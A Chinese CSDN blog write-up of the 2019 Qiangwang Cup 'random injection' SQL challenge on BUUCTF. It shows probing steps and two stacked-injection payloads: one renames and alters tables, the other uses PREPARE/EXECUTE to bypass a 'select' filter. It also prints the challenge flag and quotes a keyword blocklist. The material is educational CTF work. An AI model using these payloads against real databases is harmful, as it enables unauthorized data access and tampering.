随便注

最新推荐文章于 2024-03-10 12:08:27 发布
最新推荐文章于 2024-03-10 12:08:27 发布
阅读量124 收藏
点赞数
分类专栏: CTF-Web-Sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/beihai2013/article/details/112917559
版权
本文介绍了在强网杯2019的CTF比赛中,如何利用堆叠注入、SQL预编译和修改表等技术进行SQL注入,包括测试语句、判断注入类型、执行show命令和实际操作案例。详细讲解了正常注入流程、SQL命令展示及安全防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目来源:强网杯2019

题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8

考察:堆叠注入,sql的show语句,sql的预编译,sql修改表

参考:https://www.cnblogs.com/chalan630/p/12583667.html,https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/

测试语句

1' and '1'='1

能够得出输入

1

时一样的回显

1'   			# 报错
1'--+  			# 正常且为True
1' and 1=1 --+  # 正常且为True
1' and 1=2 --+  # 正常且为False
?inject=1' order by 3--+ # error 1054 : Unknown column '3' in 'order clause'
inject=1'; show tables; --+ $ # 1919810931114514 words
?inject=1'; show columns from words; --+ # 
show columns from `1919810931114514`;--+

words {
id int(10);
data varchar(20);
}
1919810931114514{
flag varchar(100);
}

payload1:修改表

?inject=1'; rename table `words` to `words1`; rename table `1919810931114514` to `words`; alter table `words` change `flag` `id` VARCHAR(100) character set utf8 collate utf8_general_ci not null;--+

payload2:预编译

1';Set @a=concat("sel","ect flag from `1919810931114514`");Prepare s from @a; execute s; --+

flag

flag{34745aea-2541-43e6-884f-c67988afc34a}

sql正常注入流程

1 # 正常输入
1' # 若报错,则单引号为可能的注入点
1' --+ # 判断注入类型
1' and 1=1 --+ # 判断注入类型
1' and 1=2 --+ # 判断注入类型

1' order by 3 --+ # 判断列数

sql的show命令

show databases;
show tables;
show table from db_name;
show engine;
show character set; #显示支持哪些字符集
show columns;
show create databases; #显示已经创建的库,创建时的语句
show create table; #显示已经创建的表,创建时的语句

sql堆叠注入

添加分号;即可实现同一行执行多个sql语句

sql修改表

rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);

sql预编译

SET;									# 用于设置变量名和值
PREPARE stmt_name FROM preparable_stmt;	# 用于预备一个语句,并赋予名称,以后可以引用该语句
EXECUTE stmt_name;			 			# 执行语句
{DEALLOCATE | DROP} PREPARE stmt_name;	# 用来释放掉预处理的语句

实例
set @sql=CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
execute stmt;
BUUCTF Web [强网杯 2019]随便
2501_90251165的博客
01-16 914
进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。在输入框中输入一个2,即可查询2对应的内容。
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 715
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
BUUCTF-随便
m0_74167420的博客
03-10 1710
报错入:报错入是通过特殊函数错误使用并使其输出错误结果来获取信息的。简单点说,就是在可以进行的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。堆叠入:mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔开,而堆叠入其实就是通过结束符来执行多条sql语句。(1)报错盲,构建payload:第一种payload:inurl?
buuoj-随便
读万卷书,行万里路。
01-22 979
随便 首先,使用 1'进行测试,判断是否存在 SQL 入。从返回的结果可以看出,可能存在 SQL 入 使用 1'可以将 SQL 语句构造成 select * from table where id='1'' limit 0,1。不符合 SQL 语句,所以会导致报错。 使用截断语句 1' #进行截断处理,使得后面的限制语句失效(limit或者其他)。1’ #,而不是1 # 类似的截断语句还...
BUUCTF-随便(easy_sql)
weixin_51383898的博客
10-13 984
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错入,被过滤了使用联合入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
ctf (随便)
Glacier_Mount的博客
07-10 1013
简单的堆叠入。
BUUCTF之随便
金 帛的博客
04-03 5564
BUUCTF的WP
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1: 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
【强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。...
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 2万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
[强网杯 2019]随便
Braindance
03-03 162
根据题目尝试sql入,单引号报错,单引号加释无报错,说明存在sql入,当测试输入select时返回过滤的黑名单: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 这道题使用的是堆叠入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入).
[强网杯 2019]随便 1
tomatoff的博客
03-14 2943
1、登录页面: 2、直接提交1: 3、提交1: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1=1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
BUUCTF【Web】随便(SQL入)
qq_70434663的博客
03-02 685
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
BUUCTF-随便、Exec、EasySQL、Secret File
m0_62905261的博客
06-13 988
目录[强网杯 2019]随便[ACTF2020 新生赛]Exec[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File打开场景,里面有输入框,上面自带一个1,点击提交,有回显输入1 ' or '1'='1 有回显,因该是字符型猜测是sql入,查询字段数,输入1' order by 1 #当查询到第三个字段的时候,回显异常,说明只有两个字段输入1' union select 1,2 # 回显一个正则过滤规则过滤了很多的东西 查询数据库,输入1'; show databa
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 5960
网页环境判断是否是字符型1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
[SQL入][强网杯 2019]随便(三种姿势)
Y4tacker的博客
08-05 8430
文章目录姿势一 ---- 常规堆叠入姿势二---预处理语句姿势三 --- handeler参考文章 前言: 1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关 姿势一 ---- 常规堆叠入 堆叠入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠入可以用于执行任何SQL语句。 首先老规矩输入1 加个单引号,报错 释掉后面大概猜到表的结构了selsect id,data from words where id =,并
2019强网杯随便
最新发布
03-15
嗯,我现在要解决的是2019年强网杯CTF比赛中的“随便”这道题目。首先,我得回忆一下这道题的相关信息。记得这是一个SQL入的题目,题目名字“随便”可能暗示着有多种入方法,或者需要绕过一些过滤措施。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值